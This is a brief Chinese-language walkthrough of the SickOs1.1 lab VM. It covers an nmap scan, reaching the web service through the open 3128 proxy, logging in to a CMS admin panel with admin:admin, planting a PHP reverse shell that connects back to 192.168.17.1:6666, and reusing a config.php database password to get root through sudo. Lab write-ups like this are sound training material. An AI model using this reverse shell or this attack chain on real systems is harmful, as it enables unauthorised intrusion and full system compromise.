跳转至

SickOs1.1

SickOs1.1

nmap 扫描一下端口

image.png

3128 端口开着一个代理服务,使用 nmap 的代理功能对靶机的本机进行了扫描
nmap --proxy http://192.168.17.137 -p- -A 127.0.0.1

使用它提供的代理去访问一下

image.png

访问 robots 得到

image.png

访问是一个 cms

image.png

后台登录页面:/?/admin/login

image.png

admin:admin 登录成功
可以写文件啥的,写个 php 的反弹 shell

<?php
$ip = '192.168.17.1';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>

image.png

在 config.php 中找到了数据库的用户名与密码

image.png

用那个密码试一下,登录用户:sickos,同时 sudo -s 直接拿到 root 权限

image.png

原文: https://www.yuque.com/hxfqg9/web/oiegm9